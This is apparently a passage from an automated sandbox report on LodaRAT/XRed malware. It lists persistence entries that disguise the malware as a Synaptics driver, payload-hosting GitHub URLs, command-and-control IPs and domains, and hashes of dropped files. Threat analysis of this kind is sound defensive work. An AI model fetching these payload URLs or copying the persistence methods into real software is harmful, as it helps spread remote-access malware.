                                                                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, login.live.com, e16604.g.akamaiedge.net, onedsblobprdwus16.westus.cloudapp.azure.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, onedscolprdeus19.eastus.cloudapp.azure.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            06:56:43API Interceptor517x Sleep call for process: Synaptics.exe modified
                                                                                                                            06:57:50API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                            11:47:44AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                            11:47:56Task SchedulerRun new task: BQQQVU.exe path: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                            12:56:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BQQQVU "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                                                                                                            12:56:46AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            12:56:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BQQQVU "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                                                                                                            12:57:02AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                            12:57:10AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BQQQVU.lnk

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            185.199.108.133cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                            vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                            172.111.138.100VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                              New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                  Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                    test.msiGet hashmaliciousLodaRATBrowse
                                                                                                                                      FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                        sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                                                          LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                            JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                              KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                69.42.215.252xyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                docx.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                222.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                                                                                Domains

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                raw.githubusercontent.comSupplier.batGet hashmaliciousUnknownBrowse
                                                                                                                                                • 185.199.110.133
                                                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 185.199.111.133
                                                                                                                                                NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                                                • 185.199.111.133
                                                                                                                                                fxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 185.199.109.133
                                                                                                                                                OiMp3TH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 185.199.108.133
                                                                                                                                                8lOT1rXZp5.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 185.199.111.133
                                                                                                                                                Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 185.199.108.133
                                                                                                                                                YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 185.199.109.133
                                                                                                                                                YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 185.199.110.133
                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                • 185.199.110.133
                                                                                                                                                freedns.afraid.orgxyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                docx.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                222.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • 69.42.215.252

                                                                                                                                                ASNs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                VOXILITYGBVKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 172.111.138.100
                                                                                                                                                New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                • 172.111.138.100
                                                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 172.111.138.100
                                                                                                                                                Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 172.111.138.100
                                                                                                                                                test.msiGet hashmaliciousLodaRATBrowse
                                                                                                                                                • 172.111.138.100
                                                                                                                                                FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 172.111.138.100
                                                                                                                                                sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                                                                • 172.111.138.100
                                                                                                                                                LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 172.111.138.100
                                                                                                                                                JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 172.111.138.100
                                                                                                                                                KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 172.111.138.100
                                                                                                                                                AWKNET-LLCUSxyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                docx.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                222.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • 69.42.215.252
                                                                                                                                                FASTLYUSSupplier.batGet hashmaliciousUnknownBrowse
                                                                                                                                                • 185.199.110.133
                                                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 185.199.111.133
                                                                                                                                                NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                                                • 185.199.111.133
                                                                                                                                                https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                                                                                                • 151.101.2.137
                                                                                                                                                star.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                • 167.83.165.108
                                                                                                                                                EFT Payment_Transcript__Survitecgroup.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                • 151.101.2.137
                                                                                                                                                installeasyassist.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 151.101.65.21
                                                                                                                                                https://gtgyhtrgerftrgr.blob.core.windows.net/frhvhgse/vsgwhk.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                • 151.101.129.44
                                                                                                                                                http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 151.101.194.137
                                                                                                                                                fxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 185.199.109.133

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                37f463bf4616ecd445d4a1937da06e19xyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • 185.199.108.133
                                                                                                                                                • 142.250.185.78
                                                                                                                                                • 142.250.186.161
                                                                                                                                                valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • 185.199.108.133
                                                                                                                                                • 142.250.185.78
                                                                                                                                                • 142.250.186.161
                                                                                                                                                VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 185.199.108.133
                                                                                                                                                • 142.250.185.78
                                                                                                                                                • 142.250.186.161
                                                                                                                                                New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                • 185.199.108.133
                                                                                                                                                • 142.250.185.78
                                                                                                                                                • 142.250.186.161
                                                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 185.199.108.133
                                                                                                                                                • 142.250.185.78
                                                                                                                                                • 142.250.186.161
                                                                                                                                                Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 185.199.108.133
                                                                                                                                                • 142.250.185.78
                                                                                                                                                • 142.250.186.161
                                                                                                                                                FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                • 185.199.108.133
                                                                                                                                                • 142.250.185.78
                                                                                                                                                • 142.250.186.161
                                                                                                                                                docx.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • 185.199.108.133
                                                                                                                                                • 142.250.185.78
                                                                                                                                                • 142.250.186.161
                                                                                                                                                hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • 185.199.108.133
                                                                                                                                                • 142.250.185.78
                                                                                                                                                • 142.250.186.161
                                                                                                                                                222.msiGet hashmaliciousXRedBrowse
                                                                                                                                                • 185.199.108.133
                                                                                                                                                • 142.250.185.78
                                                                                                                                                • 142.250.186.161

                                                                                                                                                Dropped Files

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exeJPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  C:\ProgramData\Synaptics\Synaptics.exeJPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                    C:\ProgramData\Synaptics\RCXD42.tmpJPS.exeGet hashmaliciousLodaRAT, XRedBrowse

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):118
                                                                                                                                                      Entropy (8bit):3.5700810731231707
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                                      MD5:573220372DA4ED487441611079B623CD
                                                                                                                                                      SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                                      SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                                      SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_fbd2f4165bb4b57a2b8b4ed4cdcabc9d217e79a9_455b7b6e_f021d51d-937a-4ae6-9bba-897446c344f2\Report.wer

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):65536
                                                                                                                                                      Entropy (8bit):1.2163213998726685
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:9dZmrb/Vps5ImO0BU/3DzJDzqjICB4HpOO1IzuiFLZ24IO8EKDzy:58py5PBU/3JqjIy1zuiFLY4IO8zy
                                                                                                                                                      MD5:1C68849EBEE3958E67C4137B26AC9C60
                                                                                                                                                      SHA1:DF8E9F064634F65ACAD0A9EAEDD4565670E40F31
                                                                                                                                                      SHA-256:3315445610CD917EF359E047F29594492D65EF9D2EDE77C8624C3079C281FFB1
                                                                                                                                                      SHA-512:F70A0D496E9F554D343D44F380DA079C71A965DFE5B673BAEEA9321832B93AE0774582F2E3F644F12FB94D85F1A04B454C58289B08FD1C678352BE4AAA262660
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.3.3.4.5.7.7.2.3.0.9.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.3.3.4.6.8.5.6.6.8.4.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.0.2.1.d.5.1.d.-.9.3.7.a.-.4.a.e.6.-.9.b.b.a.-.8.9.7.4.4.6.c.3.4.4.f.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.9.2.8.b.0.f.-.b.c.f.8.-.4.c.d.4.-.a.3.6.a.-.c.4.a.9.4.b.6.2.2.2.0.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.4.0.-.0.0.0.1.-.0.0.1.4.-.8.2.1.b.-.b.9.4.7.a.8.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.f.4.4.d.a.6.7.5.8.d.6.2.d.3.9.c.9.f.9.6.e.1.8.7.6.3.d.c.a.6.f.c.8.5.8.3.8.5.e.f.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E82.tmp.WERInternalMetadata.xml

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6326
                                                                                                                                                      Entropy (8bit):3.72129161586642
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:R6l7wVeJXx96mB1YiS8lprW89bXBsfImC9m:R6lXJr6mB1Y03X6fIs
                                                                                                                                                      MD5:56A4137DA7B8ADB187DA4D1EDF41F5DC
                                                                                                                                                      SHA1:3112369940407C12E0BF748D75A67DE0B7C0963F
                                                                                                                                                      SHA-256:1C7D358D7BB7916D984566CD18C088AC3EE8C6804DDD6D948234F1CA95072795
                                                                                                                                                      SHA-512:0C0D2A619582920DA6BD228C140448C9AF56EF9D38B007720DEC63913DBA1294F3C88CAD556BBFB1EEF9532FB00D002A83C1D0A434E4A194A92C41AB9C6DA682
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.4.4.<./.P.i.

                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2EC1.tmp.xml

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4572
                                                                                                                                                      Entropy (8bit):4.447685200134729
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:cvIwWl8zsvJg77aI9p2WpW8VY5vYm8M4JFEFj7+q8471KZ1d:uIjfRI7bX7VmyJc7KZ1d
                                                                                                                                                      MD5:D170D19396388FD8B1C06AEBA165687B
                                                                                                                                                      SHA1:54291E220890FB7996CC8667C9FCF2B8D14D85E3
                                                                                                                                                      SHA-256:07EC40749824DA75861058215B921CAF6DFF09ABC682FED4F04D74DB63BEE730
                                                                                                                                                      SHA-512:AEC0BEFD6064EAB3681A466B468CD84D2B91895DF3691A4B1ADD56BECE50DBDD0D7E4CBD697206CA3461E1409A621DAEDAF871A75A9F71D74383B3A54392D94D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER723.tmp.dmp

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Mon Dec 30 11:57:41 2024, 0x1205a4 type
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4390688
                                                                                                                                                      Entropy (8bit):2.307414511777458
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:CC/eiqzvb4xuA9KmzZQX+EBMTKaauw6fZlqSvNaLwUMSnR2Ik7mqJH+h4ue2/4+Q:CCXTFBls9IQuiUU
                                                                                                                                                      MD5:5B57B40147845EF566C98CCACAF6390B
                                                                                                                                                      SHA1:6173AAD15BA809B38B78C1B47DA06A442C09060E
                                                                                                                                                      SHA-256:C6C3836256A2712F6E61CAE2DDD365D5304E5CA62BEA24FF77A0F30CFFF51715
                                                                                                                                                      SHA-512:105261A95D87F20B94E077D7E59883ACA223CF163C8DD072524BF25970F3EDD8070D18C9850E8BCA2CB5A277861CF4E78F73375BDF29727CB60038D758B35395
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MDMP..a..... .........rg.............]..........$%...d......................T.......8...........T...............P.@.....................................................................................................eJ......D.......GenuineIntel............T.......@...Zzrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\Synaptics\RCXD42.tmp

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):771584
                                                                                                                                                      Entropy (8bit):6.632480030468604
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Igr:ansJ39LyjbJkQFMhmC+6GD9n
                                                                                                                                                      MD5:B50AAC59E97F3D38A19ACB9253FABEBC
                                                                                                                                                      SHA1:F44DA6758D62D39C9F96E18763DCA6FC858385EF
                                                                                                                                                      SHA-256:634238998B9CA21CE7558C5410FFD9D21E42AC069FFEB1B590EED99BAC7C1F02
                                                                                                                                                      SHA-512:B8B07692BF6770D1F67F5A9CCE809F9B20EDCA21E7480151D0FA35AC1CFC61CBA5953B0475CAAA3C4892860C0CEE287E689E50FC1727CE9533FD87A85DA820B4
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXD42.tmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXD42.tmp, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: JPS.exe, Detection: malicious, Browse
